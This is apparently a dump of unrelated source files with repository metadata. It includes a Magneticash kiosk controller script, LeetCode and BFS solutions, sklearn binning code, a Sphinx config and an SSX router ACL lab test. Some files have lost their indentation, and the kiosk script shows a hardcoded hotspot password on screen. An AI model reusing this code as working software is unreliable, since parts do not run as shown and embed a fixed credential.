myfont1 =pygame.font.Font("super.ttf",20)
myfont2 =pygame.font.Font("super.ttf",15)
# render text
label = myfont.render(LabelPase, 1, (255,255,255))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2)-50,40))#(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
#myfont = pygame.font.SysFont("monospace", 45)
myfont =pygame.font.Font("super.ttf",37)
label1A = myfont1.render('NORMAL', 1, (0,255,0))
screen.blit(label1A,(275,125))
label1 = myfont.render(str(PN), 1, (255,255,255))
screen.blit(label1,(275,150))
label2A = myfont1.render('VIP', 1, (0,255,0))
screen.blit(label2A,(275,225))
label2 = myfont.render(str(PV), 1, (255,255,255))
screen.blit(label2,(275,250))
label3 = myfont2.render('www.magneticash.com', 1, (255,255,255))
screen.blit(label3,(115,305))
QrImg = pygame.image.load('qr.png')
screen.blit(QrImg, (35,115))
pygame.display.flip()
pygame.display.update()
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=activot
#while EnvioPuerto!='':
# b=1
#EnvioPuerto==''
#tarjeta==''
punto==0
ctk==0
tarjeta=''
time.sleep(0.050)
serie.flush()
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
TerminoOperacion=1
tarjetalista=1
#controlluces=1
#while EnvioPuerto!='':
# b=1
#colorfijo2('24','000','000','000','000')
def MuestraTarjeta():
#global confirmacion
global EnvioPuerto
global tarjeta
global punto
global haytarjeta
global YaEntre
global TerminoOperacion
YaEntre=0
while True:
if len(tarjeta)==15 and YaEntre==0 and TerminoOperacion==1:
print('entro a funcion debitar')
YaEntre=1
TerminoOperacion=0
Debitar()
#time.sleep(4)
if TerminoOperacion==1 and YaEntre==1:#len(tarjeta)==0
print('NO entro a funcion debitar')
YaEntre=0
#tarjeta=''
punto=0
def MiLuz():
global apb
if apb=='':
apb=0
while True:
b=1
if controlluces==0:#EnvioPuerto==''and tarjeta=='' and punto==0 and ctk==0:
luz2017('paseo')
def EnviarSerie():
global EnvioPuerto
global confirmacion
global ya
global hasta
global envie
global reintento
global tarjeta
reintento=0
envie=0
hasta=datetime.now()#+timedelta(milliseconds=1000)
while True:
ya=datetime.now()
#
if confirmacion==True and EnvioPuerto!='' and envie==0:
###print("envio")
envie=1
##print(bytes(EnvioPuerto))
reintento=0
hasta=datetime.now()+timedelta(milliseconds=1500)
confirmacion=False
serie.write(bytes(EnvioPuerto))
serie.flushOutput()
#EnvioPuerto=''
if envie==1 and confirmacion==True:
envie=0
EnvioPuerto=''
#tarjeta=''
if confirmacion==True and ya > hasta and EnvioPuerto!='' and reintento< 4 and envie==1:
#confirmacion=True
#EnvioPuerto=''
print("reintento placa")
#time.sleep(1)
##print(bytes(EnvioPuerto))
reintento=reintento+1
envie=1
hasta=datetime.now()+timedelta(milliseconds=2000)
confirmacion=False
serie.write(bytes(EnvioPuerto))
serie.flush()#Output()
#EnvioPuerto=''
if confirmacion==False and ya > hasta:
confirmacion=True
if reintento>=2:
EnvioPuerto=''
confirmacion=True
#----Config General-----
serie.write(bytes(desactivot))
infoObject = pygame.display.Info()
screen=pygame.display.set_mode((infoObject.current_w, infoObject.current_h))
pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.mixer.init()
pygame.mixer.music.set_volume(0.5)
#pygame.mouse.set_visible(s)
pygame.mouse.set_visible(0)
myfont = pygame.font.SysFont("monospace", 40)
pygame.display.toggle_fullscreen()
#----INICIO 2018 E.E.C
controlluces=1
#hilos de escucha primero 2018
#EscuchaConfig=threading.Thread(target=listen)
#EscuchaConfig.start()
#time.sleep(5.0)
#escuchar=threading.Thread(target=EscuchoPuerto)
#escuchar.start()
#mserie=threading.Thread(target=PuertoSerie)
#mserie.start()
mpantalla=threading.Thread(target=Pantalla)
mpantalla.start()
#break
#exit#2018-prueba
#Empieza viendo si tiene numero sino esta en modo config
#---busco si existen los archivos de config de numero
#---y wifi para local
tengoIP=0
try:
file=open("/home/pi/ControllerConfig/mip.mc","r")
file.close()
tengoIP=1
except:
print('Archivo mip.mc inexistente')
tengoIP=0
if tengoIP==1:
print('Abriendo Controller...')
# escuchar.terminate()
# EscuchaConfig.terminate()
os.system("sudo python3 /home/pi/Controller.py -f")
pygame.quit()
sys.exit()
else:
#controlluces=1
#msj=ObtenerMac('wlan0')
msj=subprocess.check_output("cat /sys/class/net/wlan0/address",shell=True).decode('utf8')
MiMac1=msj.strip()
#saveQRCodePNG('qrip',3,MiIp) #genero QR con numero de maquina
time.sleep(0.3)
IPFINAL=''
while IPFINAL=='':
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",30)
myfont1 =pygame.font.SysFont("comicsansms",30)
myfont2 =pygame.font.SysFont("comicsansms",30)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto='Configurando IP FINAL...'
label = myfont.render("CONFIGURACION INICIAL", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-60))
myfont =pygame.font.Font("super.ttf",20)
label1 = myfont.render(esto, 1, (255,255,255))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-25))
msj=subprocess.check_output("iw dev wlan0 link|grep SSID|awk '{print $2}'",shell=True).decode('utf8')
esto=msj.strip()
print(esto)
if esto!='':
esto='Conectado con ' + esto
label3 = myfont2.render("Buscando CtrlAdm Soft", 1, (0,255,255))
else:
#creo archivo de configuracion de red hotspot
msj=subprocess.check_output("cat /sys/class/net/wlan0/address",shell=True).decode('utf8')
MiMac1=msj.strip()
#MiMac1=MiMac1[0:2]+MiMac1[3:5]+MiMac1[6:8]+MiMac1[9:11]+MiMac1[12:14]+MiMac1[15:17]
#print(MiMac1)
esto='Connect to Controller ' + str(MiMac1)
label3 = myfont2.render("Password: MagneticCash123456", 1, (255,255,255))
label2 = myfont1.render(esto, 1, (255,255,255))
screen.blit(label2,(((infoObject.current_w - label2.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+100))
screen.blit(label3,(((infoObject.current_w - label3.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+127))
QrImg = pygame.image.load('qrip.png')
screen.blit(QrImg, (185,140))
pygame.display.flip()
pygame.display.update()
#DosMundos()
colorfijo2('24','100','101','001','010')
time.sleep(1.0)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('192.168.1.30',6000)#192.168.2.50 -- IAAPA
#print('connecting to %s port %s' % server_address)
sock.settimeout(1.0)
sock.connect(server_address)
#print('paso conexion')
#sock.settimeout(3.0)
message=MiMac1#+','+MiIp+','+NumMaq+'$XX'
#print(message)
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
amount_received = 0
amount_expected = 1#len(message)
data1=''
data=''
while data=='':
data = sock.recv(16)
data=data.decode('utf8')
IPFINAL=data
break
except:
b=1
continue
#--------
#Cuando sale con ip guarda en el archivo y reinicia
file=open("/home/pi/ControllerConfig/mip.mc","w")
file.write(str(IPFINAL))
file.close()
print('termino')
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",30)
myfont1 =pygame.font.SysFont("comicsansms",30)
myfont2 =pygame.font.SysFont("comicsansms",40)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto='IP FINAL OK'
label = myfont.render("Reiniciando Controller...", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-60))
myfont =pygame.font.Font("super.ttf",20)
label1 = myfont.render(esto, 1, (255,255,255))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-25))
msj=subprocess.check_output("iw dev wlan0 link|grep SSID|awk '{print $2}'",shell=True).decode('utf8')
esto=msj.strip()
esto='Conectado con ' + esto
label3 = myfont2.render("Ip recibida "+str(IPFINAL), 1, (0,255,255))
# else:
#creo archivo de configuracion de red hotspot
# msj=subprocess.check_output("cat /sys/class/net/wlan0/address",shell=True).decode('utf8')
# MiMac1=msj.strip()
#MiMac1=MiMac1[0:2]+MiMac1[3:5]+MiMac1[6:8]+MiMac1[9:11]+MiMac1[12:14]+MiMac1[15:17]
#print(MiMac1)
#esto='Connect to Controller ' + str(MiMac1)
#label3 = myfont2.render("Password: MagneticCash123456", 1, (255,255,255))
#label2 = myfont1.render(esto, 1, (255,255,255))
#screen.blit(label2,(((infoObject.current_w - label2.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+100))
screen.blit(label3,(((infoObject.current_w - label3.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+127))
#QrImg = pygame.image.load('qrip.png')
#screen.blit(QrImg, (185,140))
pygame.display.flip()
pygame.display.update()
#file1=open("/home/pi/ControllerConfig/ConWifi.conf","w")
#file1.write('option domain_name_servers, domain_name, domain_search, host_name\r\n')
#file1.write('option classless_static_routes\r\n')
#file1.write('option ntp_servers\r\n')
#file1.write('require dhcp_server_identifier\r\n')
#file1.write('nohook lookup-hostname\r\n')
#file1.write('SSID MagneticashAP\r\n')
#file1.write('inform '+str(IPFINAL)+'\r\n')
#file1.write('static routers=10.0.0.1\r\n')
#file1.write('static domain_name_servers=10.0.0.1\r\n')
#file1.write('static domain_search=8.8.8.8')
#file1.close()
colorfijo2('28','100','100','100','111')
time.sleep(5.0)
colorfijo2('28','100','110','111','000')
time.sleep(1.0)
#end
os.system("sudo python3 /home/pi/Controller.py -f")
#os.system("sudo reboot")
#sys.exit()
| [
"[email protected]"
] | |
dac804c33230879d67dd611d93deb94b2adc451b | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /sumRootToLeaf.py | ee43ddceb5b9ce42b6f787cf5ea3e662d9ad0968 | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | from typing import Optional
from pytree import TreeNode
class Solution:
def sumRootToLeaf(self, root: Optional[TreeNode]) -> int:
value = 0
res = 0
def dfs(root, value):
if not root:
return
value = 2 * value + root.val
if not root.left and not root.right:
nonlocal res
res += value
return
dfs(root.left, value)
dfs(root.right, value)
dfs(root, 0)
return res
| [
"[email protected]"
] | |
d5347447760b6c6389ec49923408c533d457bf16 | f865fdd970f8e37ea2aa5157374af8c4d6ced987 | /test/test_vehicle_list_list.py | 249ea92d8240a677b23124e6d62fb0bcd81d0216 | [] | no_license | gkeep-openapi/python-sdk | 7e809448355bff535b3d64e013f001e9196c5e19 | 7c4f3785b47a110386ef10109619654522c95de5 | refs/heads/master | 2022-05-28T16:13:06.643958 | 2022-05-13T14:58:39 | 2022-05-13T14:58:39 | 235,536,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 833 | py | # coding: utf-8
"""
Gkeep API
Gkeep API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from models.vehicle_list_list import VehicleListList # noqa: E501
from swagger_client.rest import ApiException
class TestVehicleListList(unittest.TestCase):
"""VehicleListList unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testVehicleListList(self):
"""Test VehicleListList"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.vehicle_list_list.VehicleListList() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"gkeep-ci-jenkins"
] | gkeep-ci-jenkins |
a2f7553243715ba929281bd6d1ad9e7e468575ee | b5e8dc7c21659ac33b6e242a298a44d30bfa3610 | /env-prod/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/binning.py | 836a2e0fa2447e9f9d31c9d25b907854bf070985 | [] | no_license | rpuegue/CoursA61 | c168b44cd9835ad7524c97b2983305c56acd8096 | a4fc8f7504491eb94cb2f1d2bf6d16674901a0c5 | refs/heads/main | 2023-03-10T09:08:31.293546 | 2021-02-22T16:25:51 | 2021-02-22T16:25:51 | 339,574,678 | 0 | 0 | null | 2021-02-22T16:25:51 | 2021-02-17T00:57:41 | Python | UTF-8 | Python | false | false | 8,304 | py | """
This module contains the BinMapper class.
BinMapper is used for mapping a real-valued dataset into integer-valued bins.
Bin thresholds are computed with the quantiles so that each bin contains
approximately the same number of samples.
"""
# Author: Nicolas Hug
import numpy as np
from ...utils import check_random_state, check_array
from ...base import BaseEstimator, TransformerMixin
from ...utils.validation import check_is_fitted
from ._binning import _map_to_bins
from .common import X_DTYPE, X_BINNED_DTYPE, ALMOST_INF
def _find_binning_thresholds(data, max_bins, subsample, random_state):
"""Extract feature-wise quantiles from numerical data.
Missing values are ignored for finding the thresholds.
Parameters
----------
data : array-like, shape (n_samples, n_features)
The data to bin.
max_bins: int
The maximum number of bins to use for non-missing values. If for a
given feature the number of unique values is less than ``max_bins``,
then those unique values will be used to compute the bin thresholds,
instead of the quantiles.
subsample : int or None
If ``n_samples > subsample``, then ``sub_samples`` samples will be
randomly chosen to compute the quantiles. If ``None``, the whole data
is used.
random_state: int or numpy.random.RandomState or None
Pseudo-random number generator to control the random sub-sampling.
See :term:`random_state`.
Return
------
binning_thresholds: list of arrays
For each feature, stores the increasing numeric values that can
be used to separate the bins. Thus ``len(binning_thresholds) ==
n_features``.
"""
rng = check_random_state(random_state)
if subsample is not None and data.shape[0] > subsample:
subset = rng.choice(np.arange(data.shape[0]), subsample, replace=False)
data = data.take(subset, axis=0)
binning_thresholds = []
for f_idx in range(data.shape[1]):
col_data = data[:, f_idx]
# ignore missing values when computing bin thresholds
missing_mask = np.isnan(col_data)
if missing_mask.any():
col_data = col_data[~missing_mask]
col_data = np.ascontiguousarray(col_data, dtype=X_DTYPE)
distinct_values = np.unique(col_data)
if len(distinct_values) <= max_bins:
midpoints = distinct_values[:-1] + distinct_values[1:]
midpoints *= .5
else:
# We sort again the data in this case. We could compute
# approximate midpoint percentiles using the output of
# np.unique(col_data, return_counts) instead but this is more
# work and the performance benefit will be limited because we
# work on a fixed-size subsample of the full data.
percentiles = np.linspace(0, 100, num=max_bins + 1)
percentiles = percentiles[1:-1]
midpoints = np.percentile(col_data, percentiles,
interpolation='midpoint').astype(X_DTYPE)
assert midpoints.shape[0] == max_bins - 1
# We avoid having +inf thresholds: +inf thresholds are only allowed in
# a "split on nan" situation.
np.clip(midpoints, a_min=None, a_max=ALMOST_INF, out=midpoints)
binning_thresholds.append(midpoints)
return binning_thresholds
class _BinMapper(TransformerMixin, BaseEstimator):
"""Transformer that maps a dataset into integer-valued bins.
The bins are created in a feature-wise fashion, using quantiles so that
each bins contains approximately the same number of samples.
For large datasets, quantiles are computed on a subset of the data to
speed-up the binning, but the quantiles should remain stable.
Features with a small number of values may be binned into less than
``n_bins`` bins. The last bin (at index ``n_bins - 1``) is always reserved
for missing values.
Parameters
----------
n_bins : int, optional (default=256)
The maximum number of bins to use (including the bin for missing
values). Non-missing values are binned on ``max_bins = n_bins - 1``
bins. The last bin is always reserved for missing values. If for a
given feature the number of unique values is less than ``max_bins``,
then those unique values will be used to compute the bin thresholds,
instead of the quantiles.
subsample : int or None, optional (default=2e5)
If ``n_samples > subsample``, then ``sub_samples`` samples will be
randomly chosen to compute the quantiles. If ``None``, the whole data
is used.
random_state: int or numpy.random.RandomState or None, \
optional (default=None)
Pseudo-random number generator to control the random sub-sampling.
See :term:`random_state`.
Attributes
----------
bin_thresholds_ : list of arrays
For each feature, gives the real-valued bin threhsolds. There are
``max_bins - 1`` thresholds, where ``max_bins = n_bins - 1`` is the
number of bins used for non-missing values.
n_bins_non_missing_ : array of uint32
For each feature, gives the number of bins actually used for
non-missing values. For features with a lot of unique values, this is
equal to ``n_bins - 1``.
missing_values_bin_idx_ : uint8
The index of the bin where missing values are mapped. This is a
constant across all features. This corresponds to the last bin, and
it is always equal to ``n_bins - 1``. Note that if ``n_bins_missing_``
is less than ``n_bins - 1`` for a given feature, then there are
empty (and unused) bins.
"""
def __init__(self, n_bins=256, subsample=int(2e5), random_state=None):
self.n_bins = n_bins
self.subsample = subsample
self.random_state = random_state
def fit(self, X, y=None):
"""Fit data X by computing the binning thresholds.
The last bin is reserved for missing values, whether missing values
are present in the data or not.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data to bin.
y: None
Ignored.
Returns
-------
self : object
"""
if not (3 <= self.n_bins <= 256):
# min is 3: at least 2 distinct bins and a missing values bin
raise ValueError('n_bins={} should be no smaller than 3 '
'and no larger than 256.'.format(self.n_bins))
X = check_array(X, dtype=[X_DTYPE], force_all_finite=False)
max_bins = self.n_bins - 1
self.bin_thresholds_ = _find_binning_thresholds(
X, max_bins, subsample=self.subsample,
random_state=self.random_state)
self.n_bins_non_missing_ = np.array(
[thresholds.shape[0] + 1 for thresholds in self.bin_thresholds_],
dtype=np.uint32)
self.missing_values_bin_idx_ = self.n_bins - 1
return self
def transform(self, X):
"""Bin data X.
Missing values will be mapped to the last bin.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data to bin.
Returns
-------
X_binned : array-like, shape (n_samples, n_features)
The binned data (fortran-aligned).
"""
X = check_array(X, dtype=[X_DTYPE], force_all_finite=False)
check_is_fitted(self)
if X.shape[1] != self.n_bins_non_missing_.shape[0]:
raise ValueError(
'This estimator was fitted with {} features but {} got passed '
'to transform()'.format(self.n_bins_non_missing_.shape[0],
X.shape[1])
)
binned = np.zeros_like(X, dtype=X_BINNED_DTYPE, order='F')
_map_to_bins(X, self.bin_thresholds_, self.missing_values_bin_idx_,
binned)
return binned
| [
"[email protected]"
] | |
fbf785d429c68337f3d04cbc3305b64d88758482 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /07_Machine_Learning_Mastery_with_Python/10/gaussian_naive_bayes.py | b5529aced1162296ffe0b53527fd96f38568671a | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 581 | py | # Gaussian Naive Bayes Classification
from pandas import read_csv
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
filename = 'pima-indians-diabetes.data.csv'
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:, 0:8]
Y = array[:, 8]
kfold = KFold(n_splits=10, random_state=7, shuffle=True)
model = GaussianNB()
results = cross_val_score(model, X, Y, cv=kfold)
print(results.mean())
| [
"[email protected]"
] | |
18c40f470894a9af81555213d823493761650de6 | 4d8439664d716ce811046969f806ccfc3fbe1add | /docs/conf.py | 11e878a9d35bb089081795e459d74eb979c3f16f | [
"MIT"
] | permissive | BuysDB/SingleCellMultiOmics | b32519be6d4a79d8c80050f91e600aceedb9983f | 441f378cbfb0af165f1ada5b8596362412b3cc48 | refs/heads/master | 2023-07-25T17:39:18.371642 | 2023-06-21T07:30:31 | 2023-06-21T07:30:31 | 187,592,829 | 21 | 9 | MIT | 2023-06-21T07:30:32 | 2019-05-20T07:47:28 | Python | UTF-8 | Python | false | false | 5,677 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# SingleCellMultiOmics documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 16 11:59:02 2019.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import glob
#sys.path.insert(0, os.path.abspath('../singlecellmultiomics/'))
sys.path.insert(0, os.path.abspath('../singlecellmultiomics'))
import sphinx_rtd_theme
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx_rtd_theme",
'sphinx.ext.autosummary',
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
#'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages','sphinx.ext.napoleon']
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
add_module_names = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'SingleCellMultiOmics'
copyright = '2019, Buys de Barbanson, Jake Yeung'
author = 'Buys de Barbanson, Jake Yeung'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.2'
# The full version, including alpha/beta/rc tags.
release = '0.0.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'SingleCellMultiOmicsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'SingleCellMultiOmics.tex', 'SingleCellMultiOmics Documentation',
'Buys de Barbanson, Jake Yeung', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'singlecellmultiomics', 'SingleCellMultiOmics Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'SingleCellMultiOmics', 'SingleCellMultiOmics Documentation',
author, 'SingleCellMultiOmics', 'One line description of project.',
'Miscellaneous'),
]
| [
"[email protected]"
] | |
8acf901f02911518883bb83b3ee13e1155dde5be | 971e0efcc68b8f7cfb1040c38008426f7bcf9d2e | /tests/artificial/transf_Integration/trend_LinearTrend/cycle_12/ar_12/test_artificial_1024_Integration_LinearTrend_12_12_0.py | ce9ad4b11a32844c2d9b12c61134643c26fb5ac1 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | antoinecarme/pyaf | a105d172c2e7544f8d580d75f28b751351dd83b6 | b12db77cb3fa9292e774b2b33db8ce732647c35e | refs/heads/master | 2023-09-01T09:30:59.967219 | 2023-07-28T20:15:53 | 2023-07-28T20:15:53 | 70,790,978 | 457 | 77 | BSD-3-Clause | 2023-03-08T21:45:40 | 2016-10-13T09:30:30 | Python | UTF-8 | Python | false | false | 270 | py | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "LinearTrend", cycle_length = 12, transform = "Integration", sigma = 0.0, exog_count = 0, ar_order = 12); | [
"[email protected]"
] | |
52ddde778566b011bf474203eeaab73b80a92abd | e1e5ffef1eeadd886651c7eaa814f7da1d2ade0a | /Systest/tests/acl-new/ACL_FUN_055.py | 56f2d44de7774024373f48e52761bd1fba98265a | [] | no_license | muttu2244/MyPython | 1ddf1958e5a3514f9605d1f83c0930b24b856391 | 984ca763feae49a44c271342dbc15fde935174cf | refs/heads/master | 2021-06-09T02:21:09.801103 | 2017-10-10T07:30:04 | 2017-10-10T07:30:04 | 13,803,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,939 | py | #!/usr/bin/env python2.5
"""
#######################################################################
#
# Copyright (c) Stoke, Inc.
# All Rights Reserved.
#
# This code is confidential and proprietary to Stoke, Inc. and may only
# be used under a license from Stoke.
#
#######################################################################
DESCRIPTION:To Verify applying outbound access-list to a port-interface
TEST PLAN: ACL Test plans
TEST CASES:ACL_FUN_055
TOPOLOGY :
Linux1 (17.1.1.1/24) -> 3/0 (17.1.1.2/24) SSX
SSX (16.1.1.2/24) 2/0 -> Linux2 (16.1.1.1/24)
HOW TO RUN:python2.5 ACL_FUN_055.py
AUTHOR: [email protected]
REVIEWER:
"""
import sys, os
mydir = os.path.dirname(__file__)
qa_lib_dir = os.path.join(mydir, "../../lib/py")
if qa_lib_dir not in sys.path:
sys.path.insert(1,qa_lib_dir)
#Import Frame-work libraries
from SSX import *
from Linux import *
from log import *
from StokeTest import test_case, test_suite, test_runner
from log import buildLogger
from logging import getLogger
from acl import *
from helpers import is_healthy
from misc import *
#import config and topo file
from config import *
from topo import *
class test_ACL_FUN_055(test_case):
myLog = getLogger()
def setUp(self):
#Establish a telnet session to the SSX box.
self.ssx = SSX(ssx["ip_addr"])
self.linux=Linux(linux['ip_addr'],linux['user_name'],linux['password'])
self.linux1=Linux(linux1['ip_addr'],linux1['user_name'],linux1['password'])
self.ssx.telnet()
self.linux.telnet()
self.linux1.telnet()
# Clear the SSX config
self.ssx.clear_config()
# wait for card to come up
self.ssx.wait4cards()
self.ssx.clear_health_stats()
def tearDown(self):
# Close the telnet session of SSX
self.ssx.close()
self.linux.close()
self.linux1.close()
def test_ACL_FUN_055(self):
# Push SSX config
self.ssx.config_from_string(script_var['ACL_FUN_055'])
self.linux1.configure_ip_interface(p1_ssx_linux1[1], script_var['linux_phy_iface1_ip_mask'])
self.linux1.configure_ip_interface(p1_ssx_linux2[1], script_var['linux_phy_iface2_ip_mask'])
self.linux.cmd("sudo /sbin/route add -net %s gw %s" %(script_var['client1_route'],script_var['client1_gateway']))
self.linux1.cmd("sudo /sbin/route add -net %s gw %s" %(script_var['client2_route'],script_var['client2_gateway']))
#changing context and clear port counters
self.ssx.cmd("context %s" %(script_var['context_name']))
self.ssx.cmd("clear ip access-list name subacl counters")
#applying nemesis tool for generating igmp packets
self.linux.cmd("ping -c 5 %s"%(script_var['linux_phy_iface2_ip']),timeout=40)
result=self.ssx.cmd("show ip access-list name subacl counters")
result=result.split('\n')
result=result[2]
result=result.split(' ')
output=result[5]
output=int(output)
self.failIfEqual(output,0,"Deny Outbound ICMP Failed")
self.ssx.cmd("clear ip access-list name subacl counters")
self.linux.cmd("sudo /usr/local/bin/nemesis tcp -S %s -D %s -d %s"%(script_var['linux_phy_iface1_ip'],script_var['linux_phy_iface2_ip'],p1_ssx_xpressvpn[1]))
result=self.ssx.cmd("show ip access-list name subacl counters")
result=result.split('\n')
result=result[2]
result=result.split(' ')
output=result[4]
output=int(output)
self.failIfEqual(output,0,"Permit Outbound TCP Failed")
# Checking SSX Health
hs = self.ssx.get_health_stats()
self.failUnless(is_healthy( hs), "Platform is not healthy")
if __name__ == '__main__':
filename = os.path.split(__file__)[1].replace('.py','.log')
log = buildLogger(filename, debug=True, console=True)
suite = test_suite()
suite.addTest(test_ACL_FUN_055)
test_runner(stream = sys.stdout).run(suite)
| [
"[email protected]"
] | |
f9d76b0440856d9311fe34261caa26b0b7aebe92 | 882c865cf0a4b94fdd117affbb5748bdf4e056d0 | /python/BOJ/10_DFS_BFS/BOJ1697_숨바꼭질2.py | bc86af4e46dc7af94108fb47b8aaa7168c43897e | [] | no_license | minhee0327/Algorithm | ebae861e90069e2d9cf0680159e14c833b2f0da3 | fb0d3763b1b75d310de4c19c77014e8fb86dad0d | refs/heads/master | 2023-08-15T14:55:49.769179 | 2021-09-14T04:05:11 | 2021-09-14T04:05:11 | 331,007,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | from collections import deque
N, K = map(int, input().split())
count = [0] * 100001
def bfs(x):
need_visit = deque([x])
while need_visit:
x = need_visit.popleft()
dx = [x-1, x+1, x*2]
if x == K:
return count[x]
for nx in dx:
if nx < 0 or nx > 100000:
continue
elif not count[nx]:
need_visit.append(nx)
count[nx] = count[x] + 1 # (이전에 방문 안했을때만, 이전 depth 기준 +1)
